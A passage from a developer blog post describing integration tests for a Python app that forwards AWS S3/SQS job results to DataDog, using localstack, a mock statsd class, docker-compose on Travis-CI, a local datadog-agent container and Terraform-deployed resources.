&lt;span class="n">gauge_metric_name&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="bp">None&lt;/span>
&lt;span class="n">gauge_metric_value&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="bp">None&lt;/span>
&lt;span class="n">gauge_tags&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="bp">None&lt;/span>
&lt;span class="n">gauge_counter&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">event&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="bp">self&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">title&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">text&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">alert_type&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">None&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">aggregation_key&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">None&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">source_type_name&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">None&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="n">date_happened&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">None&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">priority&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">None&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">tags&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">None&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">hostname&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">None&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="o">...&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">gauge&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="bp">self&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">metric&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">value&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">tags&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">None&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">sample_rate&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">None&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="o">...&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>When the MetricSubmitter class is tested, this mock class is injected instead of the real &lt;strong>statsd&lt;/strong> class, which enables assertions to be made and compare expectations with reality.&lt;/p>
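&lt;p>Filled in, the recording logic elided above might look roughly like this (a sketch consistent with the class skeleton, not the exact repository code):&lt;/p>

```python
class DataDogStatsDHelper:
    """Mock statsd client: records calls instead of sending them to a datadog-agent."""
    gauge_metric_name = None
    gauge_metric_value = None
    gauge_tags = None
    gauge_counter = 0

    def gauge(self, metric, value, tags=None, sample_rate=None):
        # Same signature as the real statsd.gauge, but only record the call.
        self.gauge_metric_name = metric
        self.gauge_metric_value = value
        self.gauge_tags = tags
        self.gauge_counter += 1

statsd = DataDogStatsDHelper()
statsd.gauge("cloud_job.images_processed", 128, tags=["env:test"])
print(statsd.gauge_metric_name, statsd.gauge_counter)  # cloud_job.images_processed 1
```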
&lt;h3 id="-aws-resources-in-localstack-">~ AWS resources in localstack ~&lt;/h3>
&lt;p>To test how the python app integrates with S3 and SQS, I decided to use &lt;strong>localstack&lt;/strong>, running in a Docker container. To make it simple and repeatable, I created a &lt;code>docker-compose.yaml&lt;/code> file that allows the configuration parameters to be defined in YAML:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-yml" data-lang="yml">&lt;span class="k">version&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="s1">&amp;#39;3.2&amp;#39;&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>&lt;span class="k">services&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">localstack&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">image&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>localstack/localstack&lt;span class="p">:&lt;/span>latest&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">container_name&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>localstack&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">ports&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- &lt;span class="s1">&amp;#39;4563-4599:4563-4599&amp;#39;&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- &lt;span class="s1">&amp;#39;8080:8080&amp;#39;&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">environment&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- SERVICES=s3&lt;span class="p">,&lt;/span>sqs&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- AWS_ACCESS_KEY_ID=foo&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- AWS_SECRET_ACCESS_KEY=bar&lt;span class="w">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The resulting fake AWS resources are accessible via different ports on localhost. In this case, S3 runs on port &lt;strong>4572&lt;/strong> and SQS on port &lt;strong>4576&lt;/strong>. Refer to the
&lt;a href="https://github.com/localstack/localstack#overview" target="_blank" rel="noopener">docs&lt;/a> on GitHub for more details on ports used by other AWS services in localstack.&lt;/p>
&lt;p>It is important to note that when localstack starts up, it is completely empty. Thus, before the integration tests can run, it is necessary to provision the S3 bucket and SQS queue in localstack, just as one would normally do it when using real AWS resources.&lt;/p>
&lt;p>For this purpose, it&amp;rsquo;s possible to write a simple bash script that can be called from the localstack container as part of an automatic init script:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">aws --endpoint-url&lt;span class="o">=&lt;/span>http://localhost:4572 s3api create-bucket --bucket &lt;span class="s2">&amp;#34;bucket-name&amp;#34;&lt;/span> --region &lt;span class="s2">&amp;#34;eu-central-1&amp;#34;&lt;/span>
aws --endpoint-url&lt;span class="o">=&lt;/span>http://localhost:4576 sqs create-queue --queue-name &lt;span class="s2">&amp;#34;queue-name&amp;#34;&lt;/span> --region &lt;span class="s2">&amp;#34;eu-central-1&amp;#34;&lt;/span> --attributes &lt;span class="s2">&amp;#34;MaximumMessageSize=4096,MessageRetentionPeriod=345600,VisibilityTimeout=30&amp;#34;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>However, for the sake of making the integration-tests self-contained, I opted to integrate this into the tests as part of a class setup phase that runs before any tests and sets up the required S3 bucket and SQS queue:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="nd">@classmethod&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">setUpClass&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="bp">cls&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="bp">cls&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">ls&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">LocalStackHelper&lt;/span>&lt;span class="p">()&lt;/span>
&lt;span class="bp">cls&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">ls&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">get_s3_client&lt;/span>&lt;span class="p">()&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">create_bucket&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">Bucket&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">cls&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">s3_bucket_name&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="bp">cls&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">ls&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">get_sqs_client&lt;/span>&lt;span class="p">()&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">create_queue&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">QueueName&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">cls&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">sqs_queue_name&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;h3 id="-creating-integration-tests-">~ Creating integration tests ~&lt;/h3>
&lt;p>As a next step I created the integration
&lt;a href="https://github.com/florianakos/python-testing/blob/master/app/test_submitter.py" target="_blank" rel="noopener">tests&lt;/a> which use the fake AWS resources in localstack, as well as the mock &lt;strong>statsd&lt;/strong> class for DataDog. I used two popular python packages to create these:&lt;/p>
&lt;ul>
&lt;li>&lt;strong>unittest&lt;/strong> which is a built-in package&lt;/li>
&lt;li>&lt;strong>pytest&lt;/strong> which is a 3rd party package&lt;/li>
&lt;/ul>
&lt;p>Actually, the test cases only use &lt;strong>unittest&lt;/strong>, while &lt;strong>pytest&lt;/strong> is used for the simple collection and execution of those tests. To get started with the &lt;strong>unittest&lt;/strong> framework, I created a python class and implemented the test cases within this class:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="kn">import&lt;/span> &lt;span class="nn">unittest&lt;/span>
&lt;span class="kn">from&lt;/span> &lt;span class="nn">app.utils.datadog_fake_statsd&lt;/span> &lt;span class="kn">import&lt;/span> &lt;span class="n">DataDogStatsDHelper&lt;/span>
&lt;span class="kn">from&lt;/span> &lt;span class="nn">app.utils.localstack_helper&lt;/span> &lt;span class="kn">import&lt;/span> &lt;span class="n">LocalStackHelper&lt;/span>
&lt;span class="kn">from&lt;/span> &lt;span class="nn">app.submitter&lt;/span> &lt;span class="kn">import&lt;/span> &lt;span class="n">MetricSubmitter&lt;/span>
&lt;span class="k">class&lt;/span> &lt;span class="nc">ProjectIntegrationTesting&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">unittest&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">TestCase&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="nd">@classmethod&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">setUpClass&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="bp">cls&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="o">...&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">setUp&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="bp">self&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="o">...&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">test_ddg_submitter_valid_payload&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="bp">self&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="o">...&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">test_ddg_submitter_invalid_payload&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="bp">self&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="o">...&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">test_aws_handler_invalid_s3key&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="bp">self&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="o">...&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">test_aws_handler_valid_s3key&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="bp">self&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="o">...&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>In the &lt;strong>setUpClass&lt;/strong> method, a few things are taken care of before tests can be executed:&lt;/p>
&lt;ul>
&lt;li>define class variables for the bucket &amp;amp; the queue&lt;/li>
&lt;li>create SQS &amp;amp; S3 clients using localstack endpoint url&lt;/li>
&lt;li>provision needed resources (Queue/Bucket) in localstack&lt;/li>
&lt;/ul>
&lt;p>To test the interaction with DataDog via the statsd client, the submitter app is executed, which stores some values in the mock &lt;strong>statsd&lt;/strong> class&amp;rsquo;s internal variables, which are then used in assertions to compare values with expectations.&lt;/p>
&lt;p>The other tests inspect the behaviour of the &lt;strong>CloudResourceHandler&lt;/strong> class. For example, one of the assertions tests whether the &lt;code>.has_available_messages()&lt;/code> function returns false when there are no more messages in the queue.&lt;/p>
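&lt;p>The idea behind that assertion can be sketched like this; &lt;code>FakeSQSClient&lt;/code> and the standalone &lt;code>has_available_messages&lt;/code> are hypothetical stand-ins, not the repository code:&lt;/p>

```python
class FakeSQSClient:
    """Stand-in for a boto3 SQS client, backed by an in-memory list."""
    def __init__(self, messages):
        self._messages = list(messages)

    def receive_message(self, QueueUrl=None, MaxNumberOfMessages=1):
        batch = self._messages[:MaxNumberOfMessages]
        self._messages = self._messages[MaxNumberOfMessages:]
        # boto3 omits the "Messages" key entirely when the queue is empty.
        return {"Messages": batch} if batch else {}

def has_available_messages(sqs, queue_url):
    return "Messages" in sqs.receive_message(QueueUrl=queue_url, MaxNumberOfMessages=1)

print(has_available_messages(FakeSQSClient([{"Body": "{}"}]), "q"))  # True
print(has_available_messages(FakeSQSClient([]), "q"))                # False
```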
&lt;p>A nice feature of &lt;strong>unittest&lt;/strong> is that it&amp;rsquo;s easy to define tasks that need to be executed before each test, to ensure a clean slate for each test. For example, the code in the &lt;strong>setUp&lt;/strong> method ensures two things:&lt;/p>
&lt;ul>
&lt;li>the fake SQS queue is emptied before each test&lt;/li>
&lt;li>class variables of the mock DataDog class are reset before each test&lt;/li>
&lt;/ul>
&lt;p>Theoretically, it would be possible to run the tests with &lt;code>pytest -s -v&lt;/code> in the python project&amp;rsquo;s root directory; however, the tests rely on localstack, so without it they would fail&amp;hellip;&lt;/p>
&lt;h3 id="-travis-ci-integration-">~ Travis-CI integration ~&lt;/h3>
&lt;p>So now that the integration tests are created, I thought it would be really nice to have them automatically run in a CI service whenever someone pushes changes to the Git repo. To this end, I created a free account on &lt;code>travis-ci.org&lt;/code> and integrated it with my GitHub repo by creating a &lt;strong>.travis.yml&lt;/strong> file with the below initial content:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-yaml" data-lang="yaml">&lt;span class="k">os&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>linux&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>&lt;span class="k">language&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>python&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>&lt;span class="k">python&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- &lt;span class="s2">&amp;#34;3.8&amp;#34;&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>&lt;span class="k">services&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- docker&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>&lt;span class="k">script&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- {...}&lt;span class="w">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>However, I still needed a way to run &lt;code>localstack&lt;/code> and then execute the integration tests within the CI environment. Luckily, I found &lt;strong>docker-compose&lt;/strong> to be a perfect fit for this purpose. I had already created a YAML file describing how to run &lt;code>localstack&lt;/code>, so I could simply add an extra container to run my tests. Here is how I created a Docker image to run the tests via docker-compose:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-dockerfile" data-lang="dockerfile">&lt;span class="k">FROM&lt;/span>&lt;span class="s"> python:3.8-alpine&lt;/span>&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">WORKDIR&lt;/span>&lt;span class="s"> /app&lt;/span>&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">COPY&lt;/span> ./requirements-test.txt ./&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">RUN&lt;/span> apk add --no-cache --virtual .pynacl_deps build-base gcc make python3 python3-dev libffi-dev &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> &lt;span class="o">&amp;amp;&amp;amp;&lt;/span> pip3 install --upgrade setuptools pip &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> &lt;span class="o">&amp;amp;&amp;amp;&lt;/span> pip3 install --no-cache-dir -r requirements-test.txt &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> &lt;span class="o">&amp;amp;&amp;amp;&lt;/span> rm requirements-test.txt&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">COPY&lt;/span> ./utils/*.py ./utils/&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">COPY&lt;/span> ./*.py ./&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">ENV&lt;/span> LOCALSTACK_HOST localstack&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">ENTRYPOINT&lt;/span> &lt;span class="p">[&lt;/span>&lt;span class="s2">&amp;#34;pytest&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s2">&amp;#34;-s&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s2">&amp;#34;-v&amp;#34;&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="err">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>It installs the necessary dependencies into an Alpine-based Python 3.8 image, adds the necessary source code, and finally executes &lt;strong>pytest&lt;/strong> to collect &amp;amp; run the tests. Here are the updates I had to make to the &lt;strong>docker-compose.yaml&lt;/strong> file:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-yaml" data-lang="yaml">&lt;span class="k">version&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="s1">&amp;#39;3.2&amp;#39;&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>&lt;span class="k">services&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">localstack&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>{...}&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">integration-tests&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">container_name&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>cloud-job-it&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">build&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">context&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>.&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">dockerfile&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>Dockerfile-tests&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">depends_on&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- &lt;span class="s2">&amp;#34;localstack&amp;#34;&lt;/span>&lt;span class="w">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Docker Compose auto-magically creates a shared network to enable connectivity between the defined services, which can call one another by name. So when the tests run in the &lt;strong>cloud-job-it&lt;/strong> container, they can use the hostname &lt;strong>localstack&lt;/strong> to create the &lt;strong>boto3&lt;/strong> session via the endpoint URL and reach the fake AWS resources.&lt;/p>
&lt;p>To make creating AWS clients against localstack easier, I used a package called
&lt;a href="https://github.com/localstack/localstack-python-client" target="_blank" rel="noopener">localstack-python-client&lt;/a>, so I don&amp;rsquo;t have to deal with port numbers and other low-level details. However, by default this client tries to use &lt;strong>localhost&lt;/strong> as the hostname, which wouldn&amp;rsquo;t work in my docker-compose setup. After digging through the source code of this Python package, I found a way to change this by setting an environment variable named &lt;strong>LOCALSTACK_HOST&lt;/strong>.&lt;/p>
&lt;p>As a final step, I just had to add two lines to the &lt;strong>.travis.yaml&lt;/strong> file:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-yaml" data-lang="yaml">&lt;span class="k">script&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- docker-compose&lt;span class="w"> &lt;/span>up&lt;span class="w"> &lt;/span>--build&lt;span class="w"> &lt;/span>--abort-on-container-exit&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- docker-compose&lt;span class="w"> &lt;/span>down&lt;span class="w"> &lt;/span>-v&lt;span class="w"> &lt;/span>--rmi&lt;span class="w"> &lt;/span>all&lt;span class="w"> &lt;/span>--remove-orphans&lt;span class="w">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Thanks to the &lt;code>--abort-on-container-exit&lt;/code> flag, docker-compose will return the exit code of the container that exits first, which fits this use-case perfectly, as the &lt;strong>cloud-job-it&lt;/strong> container only runs until the tests finish. This way the whole setup shuts down gracefully while preserving the exit code from the container, allowing the CI system to raise an alert if it&amp;rsquo;s not 0 (meaning some test failed).&lt;/p>
&lt;h3 id="-running-the-datadog-agent-locally-">~ Running the datadog-agent locally ~&lt;/h3>
&lt;p>&lt;strong>Note&lt;/strong>: while Datadog is a paid service, it&amp;rsquo;s possible to create a trial account that&amp;rsquo;s free for 2 weeks, without the need to enter credit card details. This is pretty amazing!&lt;/p>
&lt;p>Now that the integration tests are automated and passing, I wanted to run the &lt;code>datadog-agent&lt;/code> locally, so that I can test the python application with some real data submitted to Datadog via the agent. Here is an
&lt;a href="https://docs.datadoghq.com/getting_started/agent/?tab=datadogeusite" target="_blank" rel="noopener">article&lt;/a> that was particularly useful to me, with instructions on how the agent should be set up.&lt;/p>
&lt;p>While the option of running it in docker-compose was initially appealing, I eventually decided to just start it manually as a long-lived detached container. Here is how I went about doing that:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">&lt;span class="nv">DOCKER_CONTENT_TRUST&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="m">1&lt;/span> docker run -d &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> --name dd-agent &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> -v /var/run/docker.sock:/var/run/docker.sock:ro &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> -v /proc/:/host/proc/:ro &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> -v /sys/fs/cgroup/:/host/sys/fs/cgroup:ro &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> -e &lt;span class="nv">DD_API_KEY&lt;/span>&lt;span class="o">=&lt;/span>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> -e &lt;span class="nv">DD_SITE&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s2">&amp;#34;datadoghq.eu&amp;#34;&lt;/span> &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> -e &lt;span class="nv">DD_DOGSTATSD_NON_LOCAL_TRAFFIC&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="nb">true&lt;/span> &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> -p 8125:8125/udp &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> datadog/agent:7
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Most notable of these lines is the &lt;strong>DD_API_KEY&lt;/strong> environment variable which ensures that whatever data I send to the agent is associated with my own account. In addition, since I am closest to the EU region, I had to specify the endpoint via the &lt;strong>DD_SITE&lt;/strong> variable. Also, because I want the agent to accept metrics from the python app, I need to turn on a feature via the environment variable &lt;strong>DD_DOGSTATSD_NON_LOCAL_TRAFFIC&lt;/strong>, as well as expose port 8125 from the docker container to the host machine:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash"> ▶ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
477cb2ea74b2 datadog/agent &lt;span class="s2">&amp;#34;/init&amp;#34;&lt;/span> &lt;span class="m">3&lt;/span> days ago Up &lt;span class="m">3&lt;/span> days &lt;span class="o">(&lt;/span>healthy&lt;span class="o">)&lt;/span> 0.0.0.0:8125-&amp;gt;8125/udp, 8126/tcp dd-agent
&lt;/code>&lt;/pre>&lt;/div>&lt;p>All seems to be well!&lt;/p>
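&lt;p>Under the hood, DogStatsD metrics are just plain-text UDP datagrams, so the Python app can emit one with the standard library alone. A minimal sketch (the metric name and tag are made up; in practice you would likely use the official datadog client library instead):&lt;/p>

```python
import socket

def dogstatsd_counter(metric, value, tags):
    """Format a counter increment in the plain-text DogStatsD protocol:
    'metric.name:value|c|#tag1,tag2'."""
    return f"{metric}:{value}|c|#{','.join(tags)}".encode("utf-8")

if __name__ == "__main__":
    # Fire-and-forget UDP datagram to the agent listening on port 8125.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(dogstatsd_counter("cloud_job.processed", 1, ["env:dev"]),
                ("localhost", 8125))
    sock.close()
```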
&lt;h3 id="-deploying-real-aws-resources-">~ Deploying real AWS resources ~&lt;/h3>
&lt;p>Here I briefly discuss how I deployed some real resources in AWS to see my application running live. In a nutshell, I set the infra up as code in Terraform, which greatly simplified the whole process. All the necessary files are collected in a
&lt;a href="https://github.com/florianakos/python-testing/tree/master/terraform" target="_blank" rel="noopener">directory&lt;/a> of my repository:&lt;/p>
&lt;ul>
&lt;li>&lt;code>variables.tf&lt;/code> defines some variables used in multiple places&lt;/li>
&lt;li>&lt;code>init.tf&lt;/code> initialisation of the AWS provider and definition of AWS resources&lt;/li>
&lt;li>&lt;code>outputs.tf&lt;/code> defines some values that are reported when deployment finishes&lt;/li>
&lt;/ul>
&lt;p>The first and last files are not very interesting. Most of the interesting stuff happens in the &lt;strong>init.tf&lt;/strong>, which defines the necessary resources and permissions. One extra resource not mentioned before, is an AWS Lambda function, which gets executed every minute and is used to upload a JSON file to the S3 bucket. This acts as a random source of data, so that the python app has some work to do without manual intervention.&lt;/p>
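&lt;p>A rough stdlib-only sketch of such a Lambda (the field names are made up for illustration; the actual S3 upload via boto3 is only indicated in a comment):&lt;/p>

```python
import json
import random
from datetime import datetime, timezone

def build_payload() -> str:
    """Create a small random JSON document, standing in for the data
    the scheduled Lambda drops into the S3 bucket every minute."""
    return json.dumps({
        "created_at": datetime.now(timezone.utc).isoformat(),
        "job_duration_ms": random.randint(100, 5000),
        "status": random.choice(["success", "failure"]),
    })

def handler(event, context):
    # In the real function this payload would be uploaded with boto3,
    # roughly: s3.put_object(Bucket=bucket, Key=key, Body=build_payload())
    return build_payload()
```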
&lt;h3 id="-live-testing-">~ Live testing ~&lt;/h3>
&lt;p>Now that all parts seem to be ready, it&amp;rsquo;s time to run the main python app using the real S3 bucket and SQS queue, as well as the local datadog-agent. The console output provides some hints as to whether it&amp;rsquo;s able to pump the metrics from AWS to Datadog:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">▶ python3 submitter.py
Initializing new Cloud Resource Handler with SQS URL - https://.../cloud-job-results-queue
Processing available messages in SQS queue:
- sending data to DataDog via statsd/datadog-agent.
- removing message from SQS &lt;span class="o">(&lt;/span>AQEBO37smPPHg6OIqbh3HMu3g...&lt;span class="o">)&lt;/span>
- ...
- sending data to DataDog via statsd/datadog-agent.
- removing message from SQS &lt;span class="o">(&lt;/span>AQEBV0/JzMVEP6k5kBmx2kvGn...&lt;span class="o">)&lt;/span>
No more messages visible in the queue, shutting down ...
Process finished with &lt;span class="nb">exit&lt;/span> code &lt;span class="m">0&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Next, I checked my DataDog account to see whether the metric data arrived. For this I created a custom
&lt;a href="https://app.datadoghq.eu/notebook/list" target="_blank" rel="noopener">Notebook&lt;/a> with graphs to display them:&lt;/p>
&lt;p>&lt;img src="img/datadog-metrics.png" alt="DataDog Metrics">&lt;/p>
&lt;p>All seems to be well! The deployed AWS Lambda function has already run a few times, providing input data for the python app, which was successfully processed and forwarded to Datadog. As seen in the &lt;code>Notebook&lt;/code> above, it is really easy to display metric data over time for any recurring workload, which can provide pretty useful insights into those jobs.&lt;/p>
&lt;p>Furthermore, since DataDog also supports the submission of
&lt;a href="https://docs.datadoghq.com/events/" target="_blank" rel="noopener">events&lt;/a>, it becomes possible to design dashboards and create alerts which trigger based on more complex criteria, such as the presence or lack of events over certain periods of time. One such example can be seen below:&lt;/p>
&lt;p>&lt;img src="img/ok-vs-fail.png" alt="DataDog Dashboard OK">&lt;/p>
&lt;p>This is a so-called
